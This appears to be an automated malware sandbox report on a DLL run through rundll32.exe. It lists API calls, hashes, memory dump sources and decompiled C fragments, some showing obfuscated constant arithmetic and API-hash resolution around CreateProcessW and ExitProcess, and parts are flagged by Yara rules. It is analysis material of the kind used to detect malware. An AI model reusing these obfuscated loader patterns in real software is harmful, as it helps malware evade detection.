                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value$Heap$AllocProcess
                          • String ID:
                          • API String ID: 3559649508-0
                          • Opcode ID: bc84efa85cfc67f21f14a5ddee89e085df959393fc7a76460447b8e7557f46a2
                          • Instruction ID: f24b5975964de10a0d6a6d1578647d8a5d95f36be604e9af09a24fdde42b50bd
                          • Opcode Fuzzy Hash: bc84efa85cfc67f21f14a5ddee89e085df959393fc7a76460447b8e7557f46a2
                          • Instruction Fuzzy Hash: 58112E72B406029BEB505BF6DA64B163AACEF02655F024924EA12DB648F736DC45CE70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF0EB1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                          Download Yara Rule
                          Strings
                          • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6ECF0ECD
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: C:\Windows\SysWOW64\rundll32.exe
                          • API String ID: 0-2837366778
                          • Opcode ID: c6376ffc2b1f1006ac25762d4982cdad0306e375c45e2c2ad992dc1d1efe3b62
                          • Instruction ID: 725ea1f8310d6a6af4e1defd13dbe640e7c4b6644b6f03153e9cb2e7ce85b344
                          • Opcode Fuzzy Hash: c6376ffc2b1f1006ac25762d4982cdad0306e375c45e2c2ad992dc1d1efe3b62
                          • Instruction Fuzzy Hash: 1B21A132218209FFD7909FE6DC51D8B77BEEF41768B104919E859D7248F731E8428790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEDD62, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,?,6ECEDE23,00000000,?,00000001,00000000,?,6ECEDE9A,00000001,FlsFree,6ED22F84,FlsFree,00000000), ref: 6ECEDDF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-
                          • API String ID: 3664257935-2084034818
                          • Opcode ID: 3e3a39a60a0fd499f8e8f0e3292d8c0557d5cda9ea99d0a5d0e5db3f67b7027f
                          • Instruction ID: 7ab57261aed994dc20942d61160ebc8cd9cf9863c6a411f8dafa41c801a0011a
                          • Opcode Fuzzy Hash: 3e3a39a60a0fd499f8e8f0e3292d8c0557d5cda9ea99d0a5d0e5db3f67b7027f
                          • Instruction Fuzzy Hash: AC11A733A55625AFDF124AF99C40BCE3B64AF42760F100211F921AB688E770EA018AF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEEC2D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8549531A,00000000,?,00000000,6ECF7473,000000FF,?,6ECEEBBD,?,?,6ECEEB91,?), ref: 6ECEEC62
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6ECEEC74
                          • FreeLibrary.KERNEL32(00000000,?,00000000,6ECF7473,000000FF,?,6ECEEBBD,?,?,6ECEEB91,?), ref: 6ECEEC96
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 1215f2f71032ab590bc413a7a2a51eace984ce15899b60d0409faa2d8ea83652
                          • Instruction ID: 25151d04b81681d3171fd57df8b76c6f35e25a6eac2957b838d82ecb0c090ef2
                          • Opcode Fuzzy Hash: 1215f2f71032ab590bc413a7a2a51eace984ce15899b60d0409faa2d8ea83652
                          • Instruction Fuzzy Hash: 0C01A772900956EFDF018F90CE09FAEBBB9FF05754F000625F822A6690DB78A500CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC4C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6ECDC4C5
                          • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6ECDC4D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtCreateKeyedEvent$ntdll
                          • API String ID: 1646373207-1373576770
                          • Opcode ID: a0697e37fd99cb95b49effa95fe1225ae23a824925671e166e430b54c16e7069
                          • Instruction ID: 6fa6106c7db3091d8b94677d1574d3a5cd8ba1d63fc0362f1b4c4a8fb9bd210c
                          • Opcode Fuzzy Hash: a0697e37fd99cb95b49effa95fe1225ae23a824925671e166e430b54c16e7069
                          • Instruction Fuzzy Hash: 83B09272A0CD816A9E906BF27B0CE662A38AD413163828440A527DA500DB308108E921
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC480, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6ECDC485
                          • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6ECDC495
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtWaitForKeyedEvent$ntdll
                          • API String ID: 1646373207-2815205136
                          • Opcode ID: 2b80b0f86361d95882b3ab2655782390ebbb1a90feabfefc8579af2077970cf5
                          • Instruction ID: e40a8223fd6c5ee4d1a789e4b70fa5d659f36b63cffc4c04b0f1e91f2c7a4e98
                          • Opcode Fuzzy Hash: 2b80b0f86361d95882b3ab2655782390ebbb1a90feabfefc8579af2077970cf5
                          • Instruction Fuzzy Hash: 1CB09272A0CE81669E906BF27B0CE662A38AD412163424544A52BD9100DB30C108ED26
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC4A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6ECDC4A5
                          • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6ECDC4B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtReleaseKeyedEvent$ntdll
                          • API String ID: 1646373207-31681898
                          • Opcode ID: 2e7ca47452d6e6f8d7963416753f5fe8c755e5b4e1f449366ec1d24a6e5e61df
                          • Instruction ID: 1ec5361fc4051195953a116c11a6faddfed742251e73016d2befe7d32732d1a4
                          • Opcode Fuzzy Hash: 2e7ca47452d6e6f8d7963416753f5fe8c755e5b4e1f449366ec1d24a6e5e61df
                          • Instruction Fuzzy Hash: 9DB092B2A0CDC1669E906BF27B0CEA62A39AD412163424444B927D9200EB34D108E921
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC440, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6ECDC445
                          • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6ECDC455
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: SetThreadDescription$kernel32
                          • API String ID: 1646373207-1950310818
                          • Opcode ID: 59435504252971a0d9c94fe0621fce64bc5a7e84fa647e853ed57dfbe702c067
                          • Instruction ID: d01facf93826d0a712259aa86422a092dc91ec755b441841a79df141b1a55068
                          • Opcode Fuzzy Hash: 59435504252971a0d9c94fe0621fce64bc5a7e84fa647e853ed57dfbe702c067
                          • Instruction Fuzzy Hash: 56B092B2A4CD016BAE90ABF3AF1CE6A3A69AD512533424440AAA3D9100DB308008D961
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC420, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6ECDC425
                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6ECDC435
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetSystemTimePreciseAsFileTime$kernel32
                          • API String ID: 1646373207-392834919
                          • Opcode ID: 0f324b735adc3cf58be0ad04ae83b75a3bd6a26988173b3349500d9077dfcdad
                          • Instruction ID: 09e368e2d4b02315f0d97eb1a2971fa9d3fca4bc224146b4febfc0a172ee903a
                          • Opcode Fuzzy Hash: 0f324b735adc3cf58be0ad04ae83b75a3bd6a26988173b3349500d9077dfcdad
                          • Instruction Fuzzy Hash: 5FB09B7294CD01665D5057F36B0CD5A39255D5155334144406573D5105DB308004D921
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF4089, Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetConsoleOutputCP.KERNEL32(8549531A,?,00000000,?), ref: 6ECF40EC
                            • Part of subcall function 6ECF19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECF3B22,?,00000000,-00000008), ref: 6ECF1A5F
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6ECF4347
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6ECF438F
                          • GetLastError.KERNEL32 ref: 6ECF4432
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: 28995482b5b7351712b4796411875ab75b4baf1c32000f4457737b0acf80c275
                          • Instruction ID: 23221f19634ec77e3918f5ff471832d80435612d34bf2797d5a1f6fc954f410e
                          • Opcode Fuzzy Hash: 28995482b5b7351712b4796411875ab75b4baf1c32000f4457737b0acf80c275
                          • Instruction Fuzzy Hash: 87D15675D00259DFDF41CFE8C980AADBBB5FF49304F14852AE925AB245E730A947CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECECDDF, Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 22ad71476f8331713735f53bdb0cb0dd722ce629f0fcf39bf9e4f9f8aa2822c9
                          • Instruction ID: fa5b9fc76a47ca5a6a26bfbadc7e4603735440a3bb9043bb63fb5ce0e42a9813
                          • Opcode Fuzzy Hash: 22ad71476f8331713735f53bdb0cb0dd722ce629f0fcf39bf9e4f9f8aa2822c9
                          • Instruction Fuzzy Hash: CE51D072A05686AFEB198FD5C851FAA7BB8FF00314F104429E8159FA94F731E850CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF06C7, Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6ECF19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECF3B22,?,00000000,-00000008), ref: 6ECF1A5F
                          • GetLastError.KERNEL32 ref: 6ECF072B
                          • __dosmaperr.LIBCMT ref: 6ECF0732
                          • GetLastError.KERNEL32(?,?,?,?), ref: 6ECF076C
                          • __dosmaperr.LIBCMT ref: 6ECF0773
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: 668db62d4a3ebae89e9de4798b17bc69c480200429f3119577a89f6cc9c8747c
                          • Instruction ID: 8d61f8b3d1b5aeaed72459ae4f2496ac8fd2c844c196c7883b0fbb3d961b773c
                          • Opcode Fuzzy Hash: 668db62d4a3ebae89e9de4798b17bc69c480200429f3119577a89f6cc9c8747c
                          • Instruction Fuzzy Hash: 4321F531A04205EFDB909FE69881C9BB7FDFF017A8710495AE81887204F731EC428B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF57E6, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6ECF5197,?,00000001,?,?,?,6ECF4486,?,?,00000000), ref: 6ECF57FD
                          • GetLastError.KERNEL32(?,6ECF5197,?,00000001,?,?,?,6ECF4486,?,?,00000000,?,?,?,6ECF4A0D,?), ref: 6ECF5809
                            • Part of subcall function 6ECF57CF: CloseHandle.KERNEL32(FFFFFFFE,6ECF5819,?,6ECF5197,?,00000001,?,?,?,6ECF4486,?,?,00000000,?,?), ref: 6ECF57DF
                          • ___initconout.LIBCMT ref: 6ECF5819
                            • Part of subcall function 6ECF5791: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6ECF57C0,6ECF5184,?,?,6ECF4486,?,?,00000000,?), ref: 6ECF57A4
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6ECF5197,?,00000001,?,?,?,6ECF4486,?,?,00000000,?), ref: 6ECF582E
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: b2ab94f78fc0a97eee52a6532f167f3036c2898ba4fce85d8b83427a836a60ff
                          • Instruction ID: 92d58dbd7a70651b2bab0c56b9930500e0ddc016254bf986d1c9a67e4e1e5307
                          • Opcode Fuzzy Hash: b2ab94f78fc0a97eee52a6532f167f3036c2898ba4fce85d8b83427a836a60ff
                          • Instruction Fuzzy Hash: 89F0F837510615FBCFA21FD69C08D893F36FF0A6A0B108011FF1985124EA328861EB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECED3E0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                          Download Yara Rule
                          APIs
                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6ECED405
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 2118026453-2084237596
                          • Opcode ID: 8b1fc241b540ea065cc130ae591653c5fcec727dac7c774bb919e15adc43516d
                          • Instruction ID: 6848b76f2e7bb197df7fa6323d22784d649d36793b7e8532d950675e045360e0
                          • Opcode Fuzzy Hash: 8b1fc241b540ea065cc130ae591653c5fcec727dac7c774bb919e15adc43516d
                          • Instruction Fuzzy Hash: 5941897290024AAFCF02CFE4C981EEE7FB5BF88308F148059F91566628E331A951DF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: rundll32.exe PID: 6276 Parent PID: 2064 rundll32.exeCOMMON

                          Executed Functions

                          Function 0077505F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0077505F() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t29;

				_v12 = 0xab28db;
				_v12 = _v12 * 0xb;
				_v12 = _v12 | 0x438b2011;
				_v12 = _v12 ^ 0x47dfe9f9;
				_v8 = 0x2279c5;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x1ef6af05;
				_v16 = 0x91523b;
				_v16 = _v16 ^ 0x417bd16a;
				_v16 = _v16 ^ 0x41eb784b;
				E00780A93(0x9aad6eb1, 0x12d, _t29, _t29, 0x97da6f6d);
				ExitProcess(0);
			}







                          0x00775065
                          0x0077507c
                          0x00775084
                          0x0077508b
                          0x00775092
                          0x0077509d
                          0x007750a0
                          0x007750a4
                          0x007750ab
                          0x007750b2
                          0x007750b9
                          0x007750c9
                          0x007750d3

                          APIs
                          • ExitProcess.KERNEL32(00000000), ref: 007750D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, Offset: 00770000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: KxA
                          • API String ID: 621844428-223459762
                          • Opcode ID: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
                          • Instruction ID: 25f9c090a4a0fcf041215a020c87644d5672dace2635422a2bd68a7a13d69905
                          • Opcode Fuzzy Hash: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
                          • Instruction Fuzzy Hash: 8F01F274D05208FBCB48DFE9D94A98DFFB4EB40304F218199E511A72A0D7702B989B45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00772C3A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E00772C3A(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t23;
				int _t29;
				WCHAR* _t33;

				_push(_a12);
				_t33 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0077358A(_t23);
				_v16 = 0x4d9c80;
				_v16 = _v16 | 0xcc7fbb6c;
				_v16 = _v16 ^ 0xcc74081e;
				_v12 = 0xfa0b63;
				_v12 = _v12 | 0xd4c459ea;
				_v12 = _v12 ^ 0xd4f66af0;
				_v8 = 0x175dc5;
				_v8 = _v8 | 0x605a8863;
				_v8 = _v8 ^ 0x60557826;
				E00780A93(0xaea26b2f, 0x23c, __ecx, __ecx, 0x97da6f6d);
				_t29 = lstrcmpiW(_t33, _a8); // executed
				return _t29;
			}









                          0x00772c41
                          0x00772c44
                          0x00772c46
                          0x00772c49
                          0x00772c4c
                          0x00772c4d
                          0x00772c4e
                          0x00772c53
                          0x00772c5d
                          0x00772c64
                          0x00772c6b
                          0x00772c72
                          0x00772c79
                          0x00772c80
                          0x00772c87
                          0x00772c8e
                          0x00772caf
                          0x00772cbb
                          0x00772cc1

                          APIs
                          • lstrcmpiW.KERNELBASE(?,CC74081E,?,?,?,?,?,?,?,?,00000000), ref: 00772CBB
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, Offset: 00770000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID: &xU`
                          • API String ID: 1586166983-1954668127
                          • Opcode ID: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction ID: a2cb2bdd87be9cb1b503de554a0dce591d60836e1bef7431704a31ded56245f5
                          • Opcode Fuzzy Hash: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction Fuzzy Hash: E1011675D01248FBDB08DFE5994A9DEBFB4EF04310F00C098E81966221D7759B249B96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0077F66B, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                          Download Yara Rule
                          C-Code - Quality: 39%
                          			E0077F66B(WCHAR* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a40, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, int _a56, WCHAR* _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;
				WCHAR* _t67;

				_push(_a60);
				_t67 = __ecx;
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0077358A(_t46);
				_v12 = 0xe19ae5;
				_v12 = _v12 + 0xe09a;
				_t59 = 0x16;
				_v12 = _v12 * 0x55;
				_v12 = _v12 ^ 0x4b33a1b3;
				_v8 = 0x3d4fbd;
				_v8 = _v8 ^ 0xea855bbf;
				_t60 = 0x67;
				_v8 = _v8 / _t59;
				_v8 = _v8 ^ 0x0aa3a294;
				_v16 = 0x5e6fbc;
				_v16 = _v16 / _t60;
				_v16 = _v16 ^ 0x00005386;
				E00780A93(0xae3271c4, 0x240, _t60, _t60, 0x97da6f6d);
				_t57 = CreateProcessW(_t67, _a60, 0, 0, _a56, 0, 0, 0, _a40, _a44); // executed
				return _t57;
			}











                          0x0077f673
                          0x0077f678
                          0x0077f67a
                          0x0077f67d
                          0x0077f67e
                          0x0077f681
                          0x0077f684
                          0x0077f687
                          0x0077f688
                          0x0077f689
                          0x0077f68c
                          0x0077f68f
                          0x0077f692
                          0x0077f695
                          0x0077f698
                          0x0077f699
                          0x0077f69c
                          0x0077f69d
                          0x0077f69e
                          0x0077f6a3
                          0x0077f6ad
                          0x0077f6bc
                          0x0077f6bf
                          0x0077f6c2
                          0x0077f6c9
                          0x0077f6d0
                          0x0077f6dc
                          0x0077f6dd
                          0x0077f6e2
                          0x0077f6e9
                          0x0077f6fa
                          0x0077f6fd
                          0x0077f719
                          0x0077f733
                          0x0077f73a

                          APIs
                          • CreateProcessW.KERNELBASE(2D09D167,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0077F733
                          Memory Dump Source
                          • Source File: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, Offset: 00770000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
                          • Instruction ID: c4351abe5009e5026d2a8bcae281aac163aa73bee75fced4e1479e746a0c9df3
                          • Opcode Fuzzy Hash: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
